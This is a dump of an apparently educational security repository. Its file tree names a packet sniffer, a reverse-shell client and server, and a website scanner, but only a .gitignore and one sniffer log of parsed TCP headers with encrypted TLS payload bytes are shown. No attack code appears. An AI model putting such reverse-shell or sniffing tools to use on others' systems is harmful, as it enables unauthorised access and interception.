├── .gitignore ├── Network-Sniffer ├── data packets │ ├── chromium.txt │ ├── facebook.txt │ └── youtube.txt └── sniffer.py ├── README.md ├── Reverse-Shell ├── client.py └── server.py ├── Sockets ├── echo │ ├── echoClient.c │ └── echoServer.c └── time │ ├── timeClient.c │ └── timeServer.c └── Website-Scanner ├── domain.py ├── general.py ├── ip_address.py ├── main.py ├── nmap.py ├── robots_txt.py ├── website.py ├── websites ├── facebook │ ├── domain-name.txt │ ├── full-url.txt │ ├── nmap.txt │ ├── robots-txt.txt │ └── whois.txt ├── gmail │ ├── domain-name.txt │ ├── full-url.txt │ ├── nmap.txt │ ├── robots-txt.txt │ └── whois.txt ├── linkedin │ ├── domain-name.txt │ ├── full-url.txt │ ├── nmap.txt │ ├── robots-txt.txt │ └── whois.txt ├── reddit │ ├── domain-name.txt │ ├── full-url.txt │ ├── nmap.txt │ ├── robots-txt.txt │ └── whois.txt └── thenewboston │ ├── domain-name.txt │ ├── full-url.txt │ ├── nmap.txt │ ├── robots-txt.txt │ └── whois.txt └── whois.py /.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | *.pyc 3 | **/__pycache__ 4 | -------------------------------------------------------------------------------- /Network-Sniffer/data packets/chromium.txt: -------------------------------------------------------------------------------- 1 | Ethernet Frame: 2 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 3 | - IPv4 Packet: 4 | - Version: 4, Header Length: 20, TTL: 59, 5 | - Protocol: 6, Source: 172.217.24.227, Target: 192.168.0.7 6 | - TCP Packet: 7 | - Source Port: 443, Destination Port: 59918 8 | - Sequence: 3863018782, Acknowledgement: 399128352 9 | - Flags: 10 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 11 | - Data: 12 | \xc2\x23\x70\x01\x3c\x91\xc2\xd4\x95\x62\x69\xab\x95\x4e\xba\xbf\xfc\xc1\xa5 13 | \x8e\x5e\x02\x20\xd0\xfc\xf8\xce\x5e\x06\xb0\x05\x87\x07\xc4\x63\x40\x5b\xb6 14 | \xd8\xe0\xae\x27\x6b\x02\x99\x81\x91\x9a\xb6\x08\x42\x43\x4d\xfe\xa9\xba\x0b 15 | \x6f\x8c\xe7\x06\x5a\xb3\xab\xc0\x7a\x3d\x39\xa3\xb8\x61\xa4\x2f\x60\xdb\xd1 16 | \xcb\x43\xa4\x1a\x5b\x4a\xc0\xa6\xcd\x1e\xcc\x6c\xfa\x3c\x00\x6a\x53\x0d\x7a 17 | \xe8\x70\x6c\x0c\x2e\xc0\x98\x9a\x77\xea\x6b\xff\xd2\x35\x11\xe5\x49\xdb\x31 18 | \xf1\xdd\xc4\x56\x30\xf4\xe0\x60\x6f\x15\xf4\x7d\x27\xa5\xab\x7b\x1c\x8c\xcb 19 | \xb7\x5f\x50\x55\xfd\xd8\xfc\xd3\xfd\x5d\xec\xab\x5c\xbb\x7b\xfd\xc4\x79\x8b 20 | \x17\xee\xbd\xb4\x25\x15\x4c\x8e\xae\xad\xfc\x26\x7f\xdc\x07\x25\x49\xe3\x54 21 | \x46\x4c\xe5\xe9\xee\x64\x7d\xb5\x77\x5c\x74\x06\x38\x0a\x1b\xd7\x54\xb8\x71 22 | \x49\x0d\x6e\x25\xa0\x61\xad\x33\xe7\x42\x67\x3c\xd6\x6d\x3f\x4e\x13\x86\xc6 23 | \x4f\xe1\x5d\x90\x55\xc3\x5c\x07\x0a\x5d\x32\x0a\x57\x62\xb6\x83\x50\x33\xd6 24 | \x74\xd8\x05\x8a\x86\x58\x52\xb5\x38\x0d\xe2\xdd\x94\x7f\xf9\xba\x0a\xbe\x25 25 | \xaa\x78\x9a\xc5\xc3\x0a\x04\xe4\xe6\x51\xd3\x0a\xad\x4e\x94\xc1\xb9\x30\xc9 26 | \x9d\x3a\xeb\x42\x53\xee\x8a\xdf\xbb\xf7\x64\x8a\xdb\x9e\x5a\x57\xd2\x12\x6b 27 | \x26\x6e\x2e\x22\x47\x73\x8f\xef\xd9\xb9\x63\xfa\xdb\xa9\xaf\x00\x45\x05\xcd 28 | \xa8\x5d\x30\x89\xb3\x51\x08\xce\xaf\x00\xee\x1a\xd5\x9f\x8f\x0f\xbb\xc8\x9b 29 | \x71\x44\xb3\x71\x41\x52\xe3\x1a\x0f\xa6\xd7\x38\x50\x22\x62\x8e\x7c\xa9\xb7 30 | \x91\x12\x3f\x9d\xb1\x38\xeb\x63\xf4\xc9\xa6\xbd\xae\x47\xbf\x67\x64\x1f\x2c 31 | \xc5\xa4\x19\x4d\x2b\xfb\x59\x5c\xd6\x60\x1e\x92\x5f\xa8\xae\xbf\x04\x59\x3d 32 | \x63\x59\x89\xb6\x0c\xea\x7b\x1a\xcd\x08\x9f\x79\x92\x02\x6b\x9d\x92\xfd\x30 33 | \x95\xb6\xba\xc7\x95\x67\x84\xd8\xdc\xfb\xc8\x50\x2a\x6e\x12\x47\xca\x3b\xa8 34 | \xc2\x31\x97\xb4\x72\x70\x48\x60\xae\xa5\xe1\xe9\xdd\xf6\xa6\x2b\x72\x0d\xf3 35 | \x4e\xa4\xee\x49\x8d\x58\x39\x28\xaf\xcd\x5b\x70\xdd\x0b\x05\x55\xb0\xc4\xbe 36 | \xbb\xf4\x3b\x5b\xcf\xbd\xf6\xca\x29\x31\xb6\xd2\xad\xe6\x81\x4a\xf1\x47\xe9 37 | \x21\xa1\xe5\xa4\x6f\xaf\x24\x90\x4b\x35\xaf\x96\x8f\x5d\xec\xd9\x46\x5e\xd4 38 | \xdb\x47\x72\x76\x07\x38\x19\x74\x4b\xa2\x0c\x7a\x4e\xc4\xeb\xb0\x9f\xfe\x56 39 | \x33\x8b\x26\x5a\xd4\xa7\xac\x48\xaf\xc1\xca\xc8\xd7\xef\xab\x40\x09\x69\x84 40 | \x60\x28\xe9\x82\x7c\xa0\x5c\x44\x48\x1b\xad\x7c\x05\x53\x46\x56\xd5\x40\xec 41 | \x3f\xf7\xa0\x98\x2a\x77\x67\xe5\xc6\x3a\x0a\x4d\x48\x2d\xb7\x2f\x90\x1f\xb4 42 | \xdb\xaf\x82\xe1\xa8\xd2\x73\x06\xd6\xa4\x00\x29\x45\x55\x18\x71\x97\xbf\x84 43 | \xdf\xfa\xf0\x4a\x1b\x2a\x37\x6f\xa9\x21\xdd\x3a\xf5\xb2\x07\x17\xcd\x52\xbe 44 | \xfd\x19\x6f\x11\xd0\xb0\x5f\xa4\xf7\x48\x72\x46\x18\xa4\xc4\x0b\x16\x79\xd5 45 | \x8a\x72\xef\xdc\xee\xa3\x54\xc3\xec\x9b\x24\x95\xf1\x17\x03\x03\x05\x85\x00 46 | \x00\x00\x00\x00\x00\x00\x69\x0e\x20\x8f\x41\x05\x46\x54\x78\x9a\x01\x9b\xb5 47 | \xd0\x18\x63\xa9\x88\xd0\x31\x38\x86\x71\xfa\x99\x4e\x9e\xd8\x27\x4f\x9a\x67 48 | \x46\x70\x0c\x0e\x2e\x57\x1f\x50\x31\x2d\xe5\x29\xc6\x87\x97\xff\x99\xbd\xc9 49 | \x6b\x74\x3d\x62\xf9\x6f\xf0\xa5\x82\xea\xca\x1f\xe4\x7c\x59\xcd\x5b\x6c\x28 50 | \x0d\xac\xbb\x86\x12\x99\x47\x8c\x95\x00\xa2\x74\x1b\xbc\xbb\x39\x43\x37\xa0 51 | \xbd\x16\x80\xf8\xc7\x2a\x01\x69\xcb\xa8\x6a\x97\xd3\xf5\x3e\x56\x3e\x9f\x1e 52 | \x72\xee\x15\x46\xbf\x18\xb7\xe3\xc7\xff\x80\x0a\xee\x54\x2a\x82\x5b\x95\x6d 53 | \x63\xb9\x3b\x5d\xbd\xb3\x03\x68\xf6\x7a\xdd\x41\xf9\xb5\xa3\x5f\xb4\xe0\xd4 54 | \x18\x4d\x21\x45\x59\xb9\x09\x7b\xde\x76\xfa\x3d\x01\x02\xe5\x77\xeb\x09\x64 55 | \x4d\xf9\x35\xad\xb0\x8c\x5b\x43\xd8\x2d\xfc\xf5\xad\xdb\xf8\x9f\x5b\x9d\xce 56 | \x67\x8c\x1f\xb3\x01\x7c\xda\xc9\x49\x1f\x3c\xc7\x7a\xcf\x05\xc9\xc8\x15\x32 57 | \x53\xc1\x05\xf2\x5e\xbd\xd6\x89\x54\x89\x20\xea\x53\x8d\xd5\xc7\xf9\x11\x87 58 | \xc3\xcc\xa7\xa2\xc2\x95\xb0\x69\x69\x11\xa6\x5a\x78\x8a\xd9\x2c\xab\x37\x3f 59 | \x2f\xbb\x5f\x02\x6b\x72\xbd\x32\xfc\x51\x2a\x68\xc7\xc9\x70\x7c\xe4\x0c\x74 60 | \x4c\xee\xe9\x75\x9c\xa4\xe8\x8e\xa3\x95\xa3\x5a\xee\x9e\x04\xfe\xe8\xe7\xda 61 | \xf3\x01\x73\xb2\x66\x3a\x31\xcb\x14\xdc\x66\x72\x87\x93\x25\x38\xc5\xd5\x39 62 | \x26\x77\x83\x9a\x44\x89\x86\x98\x8c\x02\xc2\xde\x78\xd8\xfc\x16\x30\xbc\xc4 63 | \xca\x4e\x69\x95\x59\x57\x85\x52\x71\x02\xdb\xce\x82\x5a\x72\xb7\xb8\xc8\x3f 64 | \xf4\x02\x81\x37\x91\x5a\x6d\x12\xdc\x53\x8a\x2a\xfd\x1d\x34\xf2\xea\x50\x8e 65 | \xf3\x9f\x8e\xe1\x87\xe8\xfe\x48\x9d\x7f\x5e\x37\xb8\xbb\xc7\x8a\x5c\x52\x65 66 | \x16\xaa\x00\x29\x8d\x4c\x6a\x43\x24\x58\x6b\xb2\x22\xf1\xf2\xde\x2d\x60\xac 67 | \xe3\x5c\x8b\xf7\xbb\x40\xac\x7b\x3e\xd1\x0d\x24\xbd\xd0\xf8\xff\xcb\xed\x92 68 | \xa8\x25\x16\x41\x3c\x68\xf9\x08\xda\x93\x87\xfe\x87\x6e\xac\xc1\x6e\xab\x83 69 | \x4f\xa5\xd3\x3a\x31\xef\x14\x67\x8d\x14\x49\x07\x33\x4a\x1b\x95\x47\xc0\xd0 70 | \x6b\x30\x8d\x60\x7a\x79\x23\x5a\xe5\xb1\x36\x3d\xa8\xd3\x54\x05\xd6\xdc\x15 71 | \x15\x5f\xf6\x4f\xb4\x5b\xc0\xb8\x04\x56\x40\x4b\x61\x77\xd7\x04\x07\x10\xea 72 | \x73\xfb\x2c\xbb\xfa\xf4\x9d\x0f\x24\x85\xb5\xb8\xc9\xfd\x93\x74\xa7\x8a\x1f 73 | \x32\xdd\x1a\x7a\x13\x83\x17\x04\xf7\x59\x98\x5a\x0a\x24\x2a\x80\xe5\x44\x1a 74 | \x33\xe0\xfc\xfb\xd1\xa0\x10\x70\xde\x96\x50\xe9\xca\x71\x26\x3f\xdc\xa4\x1f 75 | \xe6\x23\x0d\xad\xc1\x00\xd1\xc3\x61\xce\x46\x72\xa8\x8b\x51\xeb\x37\xed\x39 76 | \x30\xae\x71\x92\x44\x1d\xc4\xcf\xba\xbf\xff\xe3\x44\x38\x3a\x1c\x04\xf9\x96 77 | \x89\xe9\xa4\xe0\x26\xd2\x00\xbd\x27\xbc\x08\x3f\x27\x17\xfb\x7e\x17\x2e\x5f 78 | \x25\x83\xcb\xee\x38\x8d\xbc\x0b\x3c\xab\xef\x55\xfd\xe4\xda\x81\x98\x9a\xce 79 | \x0f\x09\xa4\xae\x4b\xaf\x08\x80\xab\x82\x39\xc4\x64\x18\x08\x85\x5e\xf6\xd1 80 | \xa0\x25\x63\x51\xdb\x17\x19\x94\xb1\x17\x7c\x11\x83\x3c\x82\x43\xc9\xb7\xb0 81 | \x7a\x70\x09\x3c\xce\xdc\xb7\xea\xf3\x2c\x7b\xd7\x8d\xe9\x02\xa4\x3d\x57\xa3 82 | \xd9\x48\x3d\xe4\xd4\x8b\xc5\x8f\x91\xb5\xe9\x68\x7a\x42\x59\xe2\xf5\x9b\x23 83 | \x93\xaf\x1d\xe4\xd2\x5f\xb3\x81\x81\xad\x1b\x49\xa1\xc4\xa7\x95\xd0\x7b\x0c 84 | \x4a\x10\xfb\xe1\x6a\x06\x17\xf7\x3d\xe6\x9e\xb3\xae\x29\x61\x0e\xae\xf3\xb9 85 | \x8c\x3d\x8a\x7f\x91\x0d\x9c\xff\x46\x4a\x79\x54\x5f\x3e\x49\x76\x68\xb4\x76 86 | \x81\x00\x00\xa6\x92\x31\x0b\x06\xc1\x1a\xc0\xe1 87 | 88 | Ethernet Frame: 89 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 90 | - IPv4 Packet: 91 | - Version: 4, Header Length: 20, TTL: 59, 92 | - Protocol: 6, Source: 172.217.24.227, Target: 192.168.0.7 93 | - TCP Packet: 94 | - Source Port: 443, Destination Port: 59918 95 | - Sequence: 3863020200, Acknowledgement: 399128352 96 | - Flags: 97 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 98 | - Data: 99 | \x6b\x39\x85\xfb\xfd\x08\x8a\x0c\x47\x83\x2d\xc5\xc7\x8f\x4d\xb7\x9c\xf1\xaa 100 | \x7d\x07\x7e\x92\x62\x8d\x73\x2c\x4c\x4d\x92\x58\x09\xaf\xb9\x63\xb0\xbd\x9b 101 | \x6d\x48\xfa\xa0\x16\x3c\x0d\x68\xd9\x53\xaf\xcf\x9b\xd4\xd3\x01\x31\x85\x01 102 | \xa0\x95\x39\x38\xe5\x73\xe3\x27\xcf\xee\x2f\xdd\xe2\x77\xc9\xc4\xc3\x68\xd0 103 | \x50\xe3\x14\xa5\x7c\x37\x01\xee\x8d\x64\x8f\x46\xf5\x64\x30\xa0\x0a\x16\xe2 104 | \xb1\x49\x74\x8b\xe7\x5a\xcb\xb4\x6f\x50\xc5\x0b\x66\x1c\x88\xa2\x5f\x1d\xff 105 | \x84\xe9\xdd\xa4\x16\xc5\xc6\xec\x3c\xcf\xaf\xc3\xe2\x82\x9e\x78\xa8\xc3\xc9 106 | \x29\x30\xa6\x1b\x52\x58\x32\x35\xe9\x6c\xf5\x72\x57\x33\x64\x9a\x0d\x2b\xc9 107 | \x3e\xac\xc8\x90\xd5\x1a\x07\xaa\x85\xdc\xd9\x5c\x52\xb2\xb8\xb4\x72\x0a\xd5 108 | \xbb\xd5\xfb\xed\x88\x67\xdb\x1b\x8a\x07\xe5\x98\x8d\x57\xf0\xae\xf2\x8e\x14 109 | \xa1\xf0\x55\x83\xd3\x36\x32\x66\xe7\x03\x7a\x4d\xcc\x3c\xb9\x16\x3b\x19\xd3 110 | \xe9\xd0\x54\x04\xf2\x0d\x79\x19\xaf\xe7\x4f\x4e\xa7\x12\xf7\x6f\x8d\x6f\x9d 111 | \xb1\x85\xcf\xdc\x5f\xe7\xf9\x6d\xcd\x32\xd8\xdd\x9c\x5a\x71\xf1\xbe\x12\xa7 112 | \x57\x07\x15\x84\xd7\xe5\x70\x33\x78\x2b\xef\x93\x47\xe4\x65\xe6\x70\x3c\xc2 113 | \xee\x55\x58\x98\x85\x2d\x34\xeb\x7f\x54\xd4\x10\x66\x76\xfe\xad\xf9\x67\x6a 114 | \x0c\x2b\xff\x68\xd2\x74\x28\xea\x41\x8f\x6d\x36\x06\x27\x74\x15\xf2\xa4\x59 115 | \x23\x80\xc6\xe7\x9a\x53\x1b\x67\xc2\x0e\x2f\x94\x22\x33\x80\xeb\xee\xa7\x50 116 | \xda\x8f\xb3\x08\x3d\x92\xc7\x09\x08\x07\xdf\xd3\xc8\x7d\x5a\xeb\x84\x1b\xc6 117 | \xbd\x13\xee\x9b\xd5\x7d\x82\x79\x2c\x5b\xa5\x7a\xb5\xc5\x79\xf5\xb0\x94\xb7 118 | \x35\xbb\xe1\x9c\xbb\xb8\x75\xfe\x2f\x17\x22\xa5\x07\xc1\x3e\x9b\xe0\x76\x0b 119 | \x6a\x69\x26\x2d\xaf\x1e\x1f\x14\xe3\x4d\xd9\x38\xb0\x9b\x61\xb0\xb3\xd7\xae 120 | \xbe\xf1\x13\x05\x6a\xd9\x38\xe4\xf1\xda\x96\x9c\x74\x7b\x2b\x96\x9e\x7b\x10 121 | \xfd\xcb\xd6\x38\xc0\x0f\x85\x90\xa7\x7b\xe6\x47\x37\x95\x99\x61\xb2\xff\xf3 122 | \x71\xcb\x35\x99\x59\xf5\x92\x66\xd2\x03\xb3\xf0\x86\xb9\xa6\x5e\x61\x84\xf1 123 | \xd0\x5a\xc0\xed\xed\x88\xec\x09\xfe\xe3\x14\x1c\xd0\x1a\xbd\xab\x43\x93\xc0 124 | \xcb\x21\x61\x13\x1d\xe5\xc8\x88\x98\xa7\xb5\x39\x6f\x14\xfc\xa7\x44\x3e\xca 125 | \xa8\x90\x91\xe3\x70\xa2\x2f\xfa\x55\x8c\x23\x1b\xce\x27\x08\x33\x51\xbc\xea 126 | \x9e\x42\xfc\x54\xbe\x36\xb9\xd2\x4e\xca\x77\x51\xa2\x72\xee\x86\x62\x5d\x61 127 | \x4a\xab\x1f\x6b\xdc\x07\xd3\x65\xff\x3f\x57\x79\x6a\x36\xca\xe9\x9b\x29\xcd 128 | \x3a\x6f\x7d\x04\x14\x81\x2c\xe6\xb3\xbd\xea\xd4\x41\x32\xa4\xe7\xd2\x05\x1c 129 | \xfe\x8d\x8d\x52\x93\x26\xfd\x67\xd2\xc5\x9e\x90\xb0\xe7\x9b\x74\x80\xd3\x7b 130 | \xc0\xb3\x42\xda\xb5\x8e\x3f\xbd\x17\xcc\x93\x70\xa8\xb1\xa3\xf3\x3a\x2d\x93 131 | \xb6\x45\xc7\xb7\x87\x46\xb1\x79\x16\xe0\x70\xfc\x13\xe1\x03\xf6\xd1\x96\x3d 132 | \x67\xaf\x4a\x49\x93\x98\xcb\xea\xcc\x06\x0f\xd4\xbb\x17\x03\x03\x05\x85\x00 133 | \x00\x00\x00\x00\x00\x00\x6a\xe3\x18\xf5\xda\xf5\xec\x93\x96\x4a\xb3\x9f\x23 134 | \x23\xbc\x76\xd9\xfa\xb5\xbf\xe7\x3f\xc7\xf1\xbd\x3e\x2e\x50\xd2\x2e\x65\xd8 135 | \xdf\xc3\x05\x10\x91\x48\x71\xb9\xb1\xfa\x2d\x9e\xdc\x22\x19\x9e\x40\x3f\x43 136 | \xc2\x56\x1f\x00\x89\x13\xd9\x18\x92\x5d\xd2\xfd\x6b\x75\xf2\xc6\x69\x60\x1f 137 | \x47\xe3\xa1\xca\x13\x3d\x21\x6c\xd3\x3a\xe6\x28\x39\xd6\x02\xf9\xf8\xc2\x2d 138 | \x25\x44\x43\xed\x4c\x24\x38\x6e\xf1\xb8\x35\xce\x50\xfa\x74\xab\x02\xee\xfc 139 | \xe6\x05\xfe\xa5\x02\xe7\xce\x08\x11\x78\xa5\x73\xd2\xf8\x9b\x8f\xdf\x19\x9f 140 | \x00\x73\xb3\x91\xc9\xaa\x8c\x70\xa8\x1f\x28\xbb\x9e\xaf\x68\xd8\xff\x2e\xed 141 | \xea\x54\x73\x50\x97\x0d\xfa\x5f\x4d\x2c\xf6\x96\x96\x03\xe3\x99\xe4\x07\xa0 142 | \xdb\xc1\x9c\x1d\xc1\xa3\x78\x09\xbc\x3e\x3e\x6b\x87\x3f\xe6\xb2\xe0\xad\xff 143 | \x54\x2b\xe6\xec\x65\x84\x49\xfd\xa5\xed\x19\xfe\x70\xb7\xe6\x9d\x87\x80\x27 144 | \x22\x8f\xdb\x6e\x4a\x74\x6e\x51\x9c\x28\x55\xb6\x09\x63\xed\x5e\x27\xee\x85 145 | \x2b\x00\x1d\x61\x8d\x88\x55\x58\x15\x06\x2e\xc3\x21\x5c\x84\xab\xd7\x29\x28 146 | \x05\x23\x23\xfe\x12\x1c\x35\x29\xaa\xaf\xd0\xa8\x51\x07\xa6\xb6\x47\x2f\xad 147 | \x24\xc4\xed\xb4\xe0\x42\x3d\x06\x38\x66\xb7\x0d\x0f\x5f\xf4\xae\x7d\x74\xc7 148 | \xa2\x3a\xad\xdd\xc0\xa3\x41\x17\x98\xcb\xad\x42\x88\x9b\x2c\xa3\x68\x77\xda 149 | \x38\xa4\x2c\x34\x25\x11\x49\x16\x0f\x6c\x0f\xc5\x87\xf9\xb2\x5c\xdc\xed\x55 150 | \x5a\x60\x0e\x14\x33\xc9\xdf\xab\x89\x68\xf0\xce\xf0\xf1\x42\x70\x59\x56\x95 151 | \xf5\x3e\x1c\xb7\xe4\xc9\x03\x0e\x94\x4c\xe3\x93\xf2\x0b\x52\xc0\xb9\x76\x44 152 | \x51\xf8\x06\x71\xbf\xdc\x01\x8b\x24\x76\x83\x5d\x68\x36\x21\x95\x53\xa3\x7e 153 | \x4e\x9a\xce\x23\x95\x39\x4b\xbe\x78\xa0\x2c\x3d\xf1\x98\x20\x4f\xf3\xce\x1a 154 | \x9e\xf3\x39\x53\x5a\x00\xe3\x47\x4d\xf3\xb2\xad\xda\x18\xf5\xc3\xee\xa0\x43 155 | \xa0\x68\x21\xd9\xc7\x44\x97\x23\xf1\x85\xe3\x6d\x97\xa5\x0f\xdf\xd2\x36\x10 156 | \x58\x60\x66\x25\x40\x05\x2f\x94\x5b\x69\x30\x66\x90\x29\x57\x42\x70\x38\x2b 157 | \x39\xde\x1d\x18\x41\xd7\xae\xd9\x03\x76\x99\x68\x74\x1b\x90\x34\xf5\x47\x01 158 | \xaf\xf7\x53\x64\xc8\xcb\x7c\xae\x26\xfa\x27\x48\xe3\xb7\x91\x63\xa8\xb8\x60 159 | \x31\x46\xdd\x8b\x23\xde\x40\x80\xb1\x42\x72\x43\xab\x46\x3f\x44\xe0\x8c\xb8 160 | \xdb\xd8\x33\x18\xd9\x0b\x2b\x65\xfc\x24\xff\xf6\x82\x3a\x80\xbb\x1a\x51\x58 161 | \x23\x1c\x32\x78\xbe\xdf\x6e\x62\xb4\x4d\x7c\x29\xbb\x80\x6e\xb8\x7c\x1a\x0a 162 | \xfd\xe4\x7b\x00\x39\xcc\x63\xa3\x96\x37\x5d\xff\x8f\xca\x08\x35\x03\xc5\x3e 163 | \x70\xd6\x7a\x6d\xbd\x2a\xf4\xec\x7d\x4b\x58\xba\x6d\xf2\x0f\x39\x6d\xec\x50 164 | \xf8\xa8\x77\x6b\xa4\x1f\xa1\x8f\x9c\x57\x7f\xc0\x4b\x41\xbc\x44\xb0\x7b\xf1 165 | \xa9\xce\xcf\x2e\x04\xa0\x95\x8f\xed\x96\xa2\xd1\x9e\x4e\x65\x35\x1c\x11\xbc 166 | \x29\xfd\x36\x92\x12\xc6\xdd\xde\xd0\xfd\x45\xf0\x03\x1c\x1e\x30\x7c\x63\x39 167 | \x5f\x0b\x3c\xff\xb0\xa5\xf8\xe1\xfa\x30\xe0\x58\x57\x9c\x4b\x61\x00\xbd\x2a 168 | \x6e\xca\x1d\xb2\x43\xfe\x85\xf1\x67\x3a\xfa\xfc\xcb\x12\xb8\x4f\x87\xf6\xea 169 | \x84\xd1\x5d\x58\xee\xe9\xbb\x81\x2c\x6c\x9e\xc7\x1a\x0d\x27\xf5\xe9\x6e\x3a 170 | \xda\x65\xbc\xdd\xc6\x4c\x78\x75\x4e\xd7\x7f\xbd\x32\xf8\x61\xcc\xaf\x01\x82 171 | \x21\x0d\x78\x33\x17\x25\x5f\x23\x17\x29\x9f\x4e\x16\x3d\xdb\x5b\x53\xe7\x55 172 | \xb2\xf7\x39\x60\x96\x92\x6f\x19\x5e\x77\x67\x5b\x48\x83\x8e\x3d\x2c\xe9\x3d 173 | \x0f\x77\x4b\xfb\x09\x26\x0b\xa8\x85\x77\x36\xe0 174 | 175 | Ethernet Frame: 176 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 177 | - IPv4 Packet: 178 | - Version: 4, Header Length: 20, TTL: 64, 179 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.227 180 | - TCP Packet: 181 | - Source Port: 59918, Destination Port: 443 182 | - Sequence: 399128398, Acknowledgement: 3863021618 183 | - Flags: 184 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 185 | - Data: 186 | 187 | 188 | Ethernet Frame: 189 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 190 | - IPv4 Packet: 191 | - Version: 4, Header Length: 20, TTL: 59, 192 | - Protocol: 6, Source: 172.217.24.227, Target: 192.168.0.7 193 | - TCP Packet: 194 | - Source Port: 443, Destination Port: 59918 195 | - Sequence: 3863021618, Acknowledgement: 399128352 196 | - Flags: 197 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 198 | - Data: 199 | \x4b\x66\x0b\xed\x1f\xe5\x0a\xa6\xea\x33\xb2\xf3\xb0\x99\x7a\xda\xa4\xe1\xe6 200 | \x7e\x1a\x5c\x27\xfa\x40\x86\x87\x7e\xd7\xbf\x2d\xf6\xbe\x50\x50\x2b\xd3\x04 201 | \xe3\x61\x5f\x76\x5d\x49\x60\xfb\x67\x0a\xae\xeb\x58\x1d\x16\x30\x1e\x48\x11 202 | \xf7\x79\x00\x33\xff\x29\xb1\xce\x97\x44\x3c\xe7\xe4\x28\x4e\x8a\xcc\xde\x03 203 | \xbb\x70\x21\xca\x8a\xb4\x00\x2b\x37\x65\xb8\x2a\xe4\xed\x4e\xe6\xef\x3b\x93 204 | \xeb\x3b\x69\xbf\x97\xb8\x0b\x7a\x33\x54\x79\x0d\xf7\x99\xca\x8c\x5a\xb8\x87 205 | \x18\xe1\xc2\xe2\x7f\x10\x84\xc9\x1d\xe4\xbb\xa6\xb2\x33\x6c\x5a\x59\xec\xb5 206 | \x6d\x39\x77\x24\x47\xa8\x71\x10\x09\x6f\x82\xde\x76\x50\xee\x1e\xd1\x08\xcb 207 | \xf2\xa6\x04\xea\x37\x3b\x4e\x6b\x74\xac\x03\x1e\x14\x30\x41\x0e\x2e\x35\xf3 208 | \x08\x07\xb7\x56\x85\xc0\x3a\xff\xaf\x68\xea\x5c\x4f\x80\x26\xca\x82\xea\xcc 209 | \x83\x3e\x3f\x65\xa3\x75\x1b\xf5\x49\x2c\xbd\x0d\x7f\xef\xbe\x9d\xce\x74\xa6 210 | \x79\x81\x0f\x1c\x38\x8a\x06\xa2\x3e\xfc\x53\x61\xbb\x71\x4e\x5a\xb9\x8a\xbc 211 | \x2c\xdb\x9c\xff\xce\xa3\x8c\x01\x12\xe0\x90\xa5\xab\xce\x01\xe0\x38\xa6\x7e 212 | \x96\x05\x4f\x76\x5a\xfd\x69\x30\x09\x9f\x30\x6c\x7c\x16\xb4\x1c\x3b\x93\x2f 213 | \x97\x1a\xb4\x71\xf6\x44\xc2\x27\x8d\xe0\x07\x8b\xba\x26\xc2\x00\x4b\x28\xc5 214 | \x85\x54\x02\x3c\x0a\xb0\x3b\xe3\x8c\xed\x38\x65\xac\x05\xb9\xcd\xd3\xbb\xbf 215 | \x9d\xb4\x60\x1a\x0c\xb5\xf6\xe4\xcd\x1c\xa8\x6b\x22\xa3\xde\xb2\xa8\x06\x15 216 | \x21\xc7\xf1\x4c\x47\x40\xd9\xe4\xea\x5d\x33\x2b\x1b\xda\x3d\x87\x09\x9c\x48 217 | \x49\x53\x39\x70\x86\x64\x22\x79\x90\xdf\x39\xea\xfc\xb1\xca\x5d\x3c\x9d\xe0 218 | \x2c\xd0\x8b\x80\xb6\x2f\x31\xa9\x62\x2c\x8d\xa6\xa2\x39\xbf\x28\xa0\x7c\x25 219 | \x3b\x9a\x67\xfb\x8f\xe1\x4b\x63\xb2\xdc\xca\x4f\xc4\xb5\x9d\x7f\xab\x8f\xda 220 | \x93\xae\x2b\x28\xcc\x5a\x9b\xc3\xb7\x37\xf3\x45\x9e\x01\xad\xd6\x04\x6f\xaa 221 | \xc5\x7d\x95\x4e\xbe\xc1\x82\xf8\xf0\x3f\x56\xc1\xf0\x9e\xc3\xe8\xf2\x83\x74 222 | \xc8\x54\x6e\xd1\x1a\x49\x6e\xb7\xb0\x1f\xa2\x4e\x5d\x80\x3e\x21\xa7\x2a\x52 223 | \x70\x38\x49\xb4\xa8\x39\xf6\x53\xd7\x54\xb0\x13\x50\x35\x97\x6d\xda\xb2\xf4 224 | \xf2\x1a\x4c\xa0\x9b\x70\x63\x51\x17\x8d\x60\x13\x59\x5c\x07\x16\x4c\xb5\xda 225 | \x22\xbb\xf9\x0c\xc0\x60\x24\x2d\x6c\x07\x84\x3f\xcd\x54\x8d\x19\x31\x70\xa9 226 | \x8e\x83\x94\x03\x13\x2a\x6f\x8e\x52\x2a\x38\x0e\x1c\x65\x2a\x70\x10\x46\xc7 227 | \x9f\xf6\x18\x5c\x58\x69\x08\x55\x7d\x4f\x99\x86\xce\x54\xc2\x0a\xdf\xad\xb6 228 | \xe3\xf4\xcc\x13\x00\x3d\xaf\x52\xaf\xbd\x56\xa1\x95\xb4\x3c\x02\xfd\x32\xde 229 | \x69\x35\xac\x80\x78\x0b\x56\xbc\x06\xa0\xc7\xc7\x65\x19\x21\x00\xcc\x52\x9e 230 | \x49\x95\x3b\x91\x7b\xcb\x4f\x48\xa3\x63\x67\xc9\x95\x6e\xa9\xc7\xd8\xd4\x2b 231 | \xd4\x2b\x1e\xe7\x9b\x1f\x7e\xa6\x7c\xce\xe0\xe6\xd5\x7c\x4a\x5c\x53\x1e\xa8 232 | \x24\x21\x38\x5a\x26\x66\x74\xfa\xf0\x8a\x6f\x04\xbe\x17\x03\x03\x04\xf2\x00 233 | \x00\x00\x00\x00\x00\x00\x6b\xfa\x0d\x2a\xc1\x59\xe6\x51\x46\x63\x71\x3b\x16 234 | \x72\x20\x8f\x11\x5d\x63\x71\x45\x10\x60\xb5\xad\xb5\xb0\xdf\x22\xa1\xb2\xf6 235 | 